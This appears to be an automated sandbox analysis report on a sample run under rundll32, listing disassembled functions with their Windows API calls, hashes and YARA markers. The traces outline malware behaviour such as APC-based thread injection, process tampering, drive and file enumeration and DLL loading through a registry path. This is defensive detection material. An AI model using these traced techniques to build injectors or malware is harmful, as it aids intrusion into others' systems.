                              • Opcode ID: 4700240f24b2d535769b4c3658031a0ebcca38528b45e4fb341cfcf4d963d156
                              • Instruction ID: fd2516dba8b8348052d4ad20603fa01cd666dd8948dc38ad4926fba79f1219a0
                              • Opcode Fuzzy Hash: 4700240f24b2d535769b4c3658031a0ebcca38528b45e4fb341cfcf4d963d156
                              • Instruction Fuzzy Hash: 1541F2B49012068FDB04CF69C5997AEBBF0FF48304F24856DD858AB341E77AA946CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0594FD24 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,76CDF710,00000000,00000000,?,?,?,0593E30A,?), ref: 0594FDB6
                                • Part of subcall function 0594AF83: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,059363CD,00000000,00000001,-00000007,?,00000000), ref: 0594AFA6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseFreememcpy
                              • String ID:
                              • API String ID: 1301464996-0
                              • Opcode ID: a7f562729cdd024f333cdca04f574b029689deda20a01116ae96a8ef8fe5cb3d
                              • Instruction ID: d66788c1938432c53bd6b7602d2ea13992a24a945a168627898b1f78e3d50675
                              • Opcode Fuzzy Hash: a7f562729cdd024f333cdca04f574b029689deda20a01116ae96a8ef8fe5cb3d
                              • Instruction Fuzzy Hash: 9B119171A14202AFDB55DB58DC81EB97BAEEF88315F100169F6029B341DBB5AD108F54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05942BFD Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,0595A324,00000018,05946FFC,05F38E36,?,05946FFC,05F38E36,?,05946FFC,05F38E36,?,?,?,?,05946FFC), ref: 05942CB2
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 61772565536657cd676b1c88babeb19e640182398d18db0f4a7b5e396da6fcea
                              • Instruction ID: beba672639f4852077f6c53e231caad83847d2b2d67c90c4379d15ab0eda380d
                              • Opcode Fuzzy Hash: 61772565536657cd676b1c88babeb19e640182398d18db0f4a7b5e396da6fcea
                              • Instruction Fuzzy Hash: 5811BE75628305ABCB10DF55EC47CA5BFA9FB84267B448366FB098B250DE306930CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593708F Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 05937100
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934975
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,00000020,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934984
                                • Part of subcall function 0593EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0593EE2A
                                • Part of subcall function 0593EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0593EE36
                                • Part of subcall function 0593EE04: GetModuleHandleA.KERNEL32(?,05F3978E,00000000,?,00000000), ref: 0593EE56
                                • Part of subcall function 0593EE04: GetProcAddress.KERNEL32(00000000), ref: 0593EE5D
                                • Part of subcall function 0593EE04: Thread32First.KERNEL32(?,0000001C), ref: 0593EE6D
                                • Part of subcall function 0593EE04: CloseHandle.KERNEL32(?), ref: 0593EEB5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                              • String ID:
                              • API String ID: 2627809124-0
                              • Opcode ID: 7a6f991aa716eb853eddb1f93fff4e0a7ff2e6004c923d8b314e6b38907270d1
                              • Instruction ID: b8e7bdf86ceb294c2a2c1378d5992ec5f43581e7d7cf706d5a0111a891262a6f
                              • Opcode Fuzzy Hash: 7a6f991aa716eb853eddb1f93fff4e0a7ff2e6004c923d8b314e6b38907270d1
                              • Instruction Fuzzy Hash: 69016DB2628208FF9B11DBA9DD8ACAFBBECEF896557000155F505A3100DF75AE14D7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0595157A Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,059404AC,0594C384,00000000,00000000), ref: 059515F0
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934975
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,00000020,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934984
                                • Part of subcall function 05933172: lstrlen.KERNEL32(059343C6,00000000,?,?,?,?,059343C6,00000035,00000000,?,00000000), ref: 059331A2
                                • Part of subcall function 05933172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 059331B8
                                • Part of subcall function 05933172: memcpy.NTDLL(00000010,059343C6,00000000,?,?,059343C6,00000035,00000000), ref: 059331EE
                                • Part of subcall function 05933172: memcpy.NTDLL(00000010,00000000,00000035,?,?,059343C6,00000035), ref: 05933209
                                • Part of subcall function 05933172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05933227
                                • Part of subcall function 05933172: GetLastError.KERNEL32(?,?,059343C6,00000035), ref: 05933231
                                • Part of subcall function 05933172: HeapFree.KERNEL32(00000000,00000000,?,?,059343C6,00000035), ref: 05933254
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                              • String ID:
                              • API String ID: 730886825-0
                              • Opcode ID: bdc6bffd8cf1301739fd84aa4b3b5e77ac2a1316ad325474a693d2db2bf73a8e
                              • Instruction ID: 2dd6f755ab19de1865b00bd329508abd5c02f0490349e7cccdcc58765108ea2d
                              • Opcode Fuzzy Hash: bdc6bffd8cf1301739fd84aa4b3b5e77ac2a1316ad325474a693d2db2bf73a8e
                              • Instruction Fuzzy Hash: A4018C31624204FBDB11D7A8CD0AF9EBBACAB49610F000154BA41A6180DA70AA11D7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05944837 Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memset.NTDLL ref: 05944855
                                • Part of subcall function 0594A451: memset.NTDLL ref: 0594A477
                                • Part of subcall function 0594A451: memcpy.NTDLL ref: 0594A49F
                                • Part of subcall function 0594A451: GetLastError.KERNEL32(00000010,00000218,0595386D,00000100,?,00000318,00000008), ref: 0594A4B6
                                • Part of subcall function 0594A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0595386D,00000100), ref: 0594A599
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastmemset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 4290293647-0
                              • Opcode ID: c7def099805fbea0a232b0fbe7c935fd5206eb70234414c3d6e3f626be237da0
                              • Instruction ID: c23b435f5bf9f07bfe278a0adb553cf06ab32ec702d8d8c3ad5f2f001b056c8a
                              • Opcode Fuzzy Hash: c7def099805fbea0a232b0fbe7c935fd5206eb70234414c3d6e3f626be237da0
                              • Instruction Fuzzy Hash: E701FD706013586BCB21DF29D808F9A3BECBF84214F008429F84886380D774ED048FA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059373EB Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 059373F5
                                • Part of subcall function 05936261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 059362A8
                                • Part of subcall function 05936261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 059362BE
                                • Part of subcall function 05936261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 05936307
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Open$Closememset
                              • String ID:
                              • API String ID: 1685373161-0
                              • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                              • Instruction ID: 1c0592f9e5a5c8f4ab2cd85825f13d98e91c15261f25fe97c864986cfc8fcfbe
                              • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                              • Instruction Fuzzy Hash: 33E0EC34240108B7DB10AE94D85AF997F59EB44754F108015FE08AA241DA71FA60C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 05951E9D Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                              Download Yara Rule
                              APIs
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,059560E0,0000002C,059490D3,05F38E36,?,00000000,0594A484,?,00000318), ref: 05951EB7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: d59f1ec9c0857b83f1e12c6042ea229ef6f574001815da7ac6302ec55344cd9f
                              • Instruction ID: 4e5de22e4e22b052e8a6e55ec4db1db1548ea7217ad75ce5b81aa983926b3904
                              • Opcode Fuzzy Hash: d59f1ec9c0857b83f1e12c6042ea229ef6f574001815da7ac6302ec55344cd9f
                              • Instruction Fuzzy Hash: 36D01731E00219DBCB20DFA4DC4AA9EFB70BF08720F608224E86473190C7301965CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 0594BAD1 Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                                • Part of subcall function 059421B6: ExpandEnvironmentStringsW.KERNEL32(0593AEB5,00000000,00000000,00000001,00000000,00000000,0593E448,0593AEB5,00000000,0593E448,?), ref: 059421CD
                                • Part of subcall function 059421B6: ExpandEnvironmentStringsW.KERNEL32(0593AEB5,00000000,00000000,00000000), ref: 059421E7
                              • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                              • lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                              • memset.NTDLL ref: 0594BB71
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                              • lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                              • lstrlenW.KERNEL32(?), ref: 0594BBCC
                              • memset.NTDLL ref: 0594BBEF
                              • wcscpy.NTDLL ref: 0594BC01
                              • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0594BC27
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0594BC5D
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0594BC79
                              • FindNextFileW.KERNEL32(?,00000000), ref: 0594BC92
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0594BCA4
                              • FindClose.KERNEL32(?), ref: 0594BCB9
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BCCD
                              • lstrlenW.KERNEL32(0000002C), ref: 0594BCEF
                              • FindNextFileW.KERNEL32(?,00000000), ref: 0594BD65
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0594BD77
                              • FindClose.KERNEL32(?), ref: 0594BD92
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                              • String ID:
                              • API String ID: 2962561936-0
                              • Opcode ID: 34d08c74ea850f0037f48eb3de087eec9022704b586684c4faf070619519f726
                              • Instruction ID: a97c0e2efd49746f72fc56d0c2e158f1e9537f587cb78c01411eb47eb6783d60
                              • Opcode Fuzzy Hash: 34d08c74ea850f0037f48eb3de087eec9022704b586684c4faf070619519f726
                              • Instruction Fuzzy Hash: 90814AB1608345AFDB10AF28DC89F1ABBEAFF88305F404929F58696252DB74DC15CF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059310C7 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 130libraryloadernativeCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 059310FA
                              • GetLastError.KERNEL32 ref: 05931108
                              • NtSetInformationProcess.NTDLL ref: 05931162
                              • GetProcAddress.KERNEL32(?,00000000), ref: 059311A1
                              • GetProcAddress.KERNEL32(?), ref: 059311C2
                              • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 05931219
                              • CloseHandle.KERNEL32(?), ref: 0593122F
                              • CloseHandle.KERNEL32(?), ref: 05931255
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                              • String ID: v
                              • API String ID: 3529370251-1801730948
                              • Opcode ID: 132501bd6e3e87db5744b4090922bb2c14a61583a425b8aa0287f48e0dda37f6
                              • Instruction ID: c508baa68133049318c0316f57fc26d4e820d2d11ce68efa7bd1fe4c15f3ff8c
                              • Opcode Fuzzy Hash: 132501bd6e3e87db5744b4090922bb2c14a61583a425b8aa0287f48e0dda37f6
                              • Instruction Fuzzy Hash: 8A418671118345EFD701DF60D98AA6BBBF9FB88308F000A29F589D2120EB709A59DB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593B238 Relevance: 18.5, APIs: 12, Instructions: 519memoryCOMMON
                              Download Yara Rule
                              APIs
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B270
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B2A2
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B2D4
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B306
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B338
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B36A
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B39C
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B3CE
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B400
                              • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0593B593
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0593B637
                                • Part of subcall function 05947736: RtlAllocateHeap.NTDLL ref: 05947777
                                • Part of subcall function 05947736: memset.NTDLL ref: 0594778B
                                • Part of subcall function 05947736: GetCurrentThreadId.KERNEL32 ref: 05947818
                                • Part of subcall function 05947736: GetCurrentThread.KERNEL32 ref: 0594782B
                                • Part of subcall function 05936537: RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 05936540
                                • Part of subcall function 05936537: HeapFree.KERNEL32(00000000,?), ref: 05936572
                                • Part of subcall function 05936537: RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05936590
                              • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0593B5DF
                                • Part of subcall function 0593D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0593DA7B,?), ref: 0593D4E3
                                • Part of subcall function 0593D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0593D506
                                • Part of subcall function 0593D4DA: memset.NTDLL ref: 0593D515
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                              • String ID:
                              • API String ID: 3296958911-0
                              • Opcode ID: 020e81efb0b33d6d8ee35ffea50c10de5f399cbf267c93e4485c8d310f220a72
                              • Instruction ID: 4c5326dba359d5c979502304fcfd83d3c1b6c72e46e616979114e56382496c2c
                              • Opcode Fuzzy Hash: 020e81efb0b33d6d8ee35ffea50c10de5f399cbf267c93e4485c8d310f220a72
                              • Instruction Fuzzy Hash: 04F193B1B28355EBCB10EBB4D98BD2F7BDEEB482507554A24E506DB200DF30ED518B68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593FD47 Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • wcscpy.NTDLL ref: 0593FD7B
                              • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0593FD87
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0593FD98
                              • memset.NTDLL ref: 0593FDB5
                              • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0593FDC3
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0593FDD1
                              • GetDriveTypeW.KERNEL32(?), ref: 0593FDDF
                              • lstrlenW.KERNEL32(?), ref: 0593FDEB
                              • wcscpy.NTDLL ref: 0593FDFD
                              • lstrlenW.KERNEL32(?), ref: 0593FE17
                              • HeapFree.KERNEL32(00000000,?), ref: 0593FE30
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                              • String ID:
                              • API String ID: 3888849384-0
                              • Opcode ID: a123c214412fd131dd6324b6ba6935cdcd6e498a800c63216dbad163dd36bb84
                              • Instruction ID: 1dffe95f07142ab9868b414b61ea8aa6370e7e8cb4f994b1fecce42b19578dbd
                              • Opcode Fuzzy Hash: a123c214412fd131dd6324b6ba6935cdcd6e498a800c63216dbad163dd36bb84
                              • Instruction Fuzzy Hash: 9D312D71C14208FFDB119FA4DD89CAEBFBDEB08314B114426F505E2111EB35AE699B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593EE04 Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON
                              Download Yara Rule
                              APIs
                              • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0593EE2A
                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0593EE36
                              • GetModuleHandleA.KERNEL32(?,05F3978E,00000000,?,00000000), ref: 0593EE56
                              • GetProcAddress.KERNEL32(00000000), ref: 0593EE5D
                              • Thread32First.KERNEL32(?,0000001C), ref: 0593EE6D
                              • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0593EE88
                              • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0593EE99
                              • CloseHandle.KERNEL32(00000000), ref: 0593EEA0
                              • Thread32Next.KERNEL32(?,0000001C), ref: 0593EEA9
                              • CloseHandle.KERNEL32(?), ref: 0593EEB5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                              • String ID:
                              • API String ID: 2341152533-0
                              • Opcode ID: 5a1064067788ff4a6bc54f194a1bcf082e0a43277645b77543075afdd1d1b62d
                              • Instruction ID: 8b9c049fc4512b1a44ac18464ebb4b076bd5ef5eac44c4c1c8dce3f7d683cb5d
                              • Opcode Fuzzy Hash: 5a1064067788ff4a6bc54f194a1bcf082e0a43277645b77543075afdd1d1b62d
                              • Instruction Fuzzy Hash: A2218C72904208EFDF11AFE0DC8ACAEBFBDFB48355B004129F601A6150DB309D65CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0593EC00 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87registrylibraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0593EC1B
                              • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0593ECD3
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0593EC69
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0593EC82
                              • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0593ECA1
                              • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0593ECB3
                              • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0593ECBB
                              Strings
                              • Software\Microsoft\WAB\DLLPath, xrefs: 0593EC0C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                              • String ID: Software\Microsoft\WAB\DLLPath
                              • API String ID: 1628847533-3156921957
                              • Opcode ID: 4016a73e7ecf8aabd789bf9c59988572914690e3d534a6e9cb712ac3f8b807a0
                              • Instruction ID: 9254409ff521088b9bf18c9a056f2562e9d19b59e1bda76d166d6c6381d1a964
                              • Opcode Fuzzy Hash: 4016a73e7ecf8aabd789bf9c59988572914690e3d534a6e9cb712ac3f8b807a0
                              • Instruction Fuzzy Hash: 9421C475904618FFDB11EFA8DD8ACAEBF7EFB84250B110161F802A3220EB315E51CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 059365C2 Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 05938669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,05932028,?), ref: 0593867A
                                • Part of subcall function 05938669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,05932028,?), ref: 05938697
                              • FreeLibrary.KERNEL32(?), ref: 059366F8
                                • Part of subcall function 0594AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,0593663D,?,?), ref: 0594AFCF
                                • Part of subcall function 0594AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0593663D,?,?), ref: 0594AFF8
                                • Part of subcall function 0594AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0594B018
                                • Part of subcall function 0594AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 0594B034
                                • Part of subcall function 0594AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0593663D,?,?), ref: 0594B040
                                • Part of subcall function 0594AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0593663D,?,?), ref: 0594B043
                                • Part of subcall function 0594AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0593663D,?,?), ref: 0594B04F
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B06C
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B086
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B09C
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B0B2
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B0C8
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B0DE
                              • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0593664E
                              • lstrlenW.KERNEL32(?), ref: 0593666A
                              • lstrlenW.KERNEL32(?), ref: 05936682
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0593669B
                              • lstrcpyW.KERNEL32(00000002), ref: 059366B0
                                • Part of subcall function 05951C9B: lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,059366C0,?,00000000,?), ref: 05951CAB
                                • Part of subcall function 05951C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,059366C0,?,00000000,?), ref: 05951CCD
                                • Part of subcall function 05951C9B: lstrcpyW.KERNEL32(00000000,?), ref: 05951CF9
                                • Part of subcall function 05951C9B: lstrcatW.KERNEL32(00000000,?), ref: 05951D0C
                              • FindNextFileW.KERNEL32(?,00000010), ref: 059366D8
                              • FindClose.KERNEL32(00000002), ref: 059366E6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
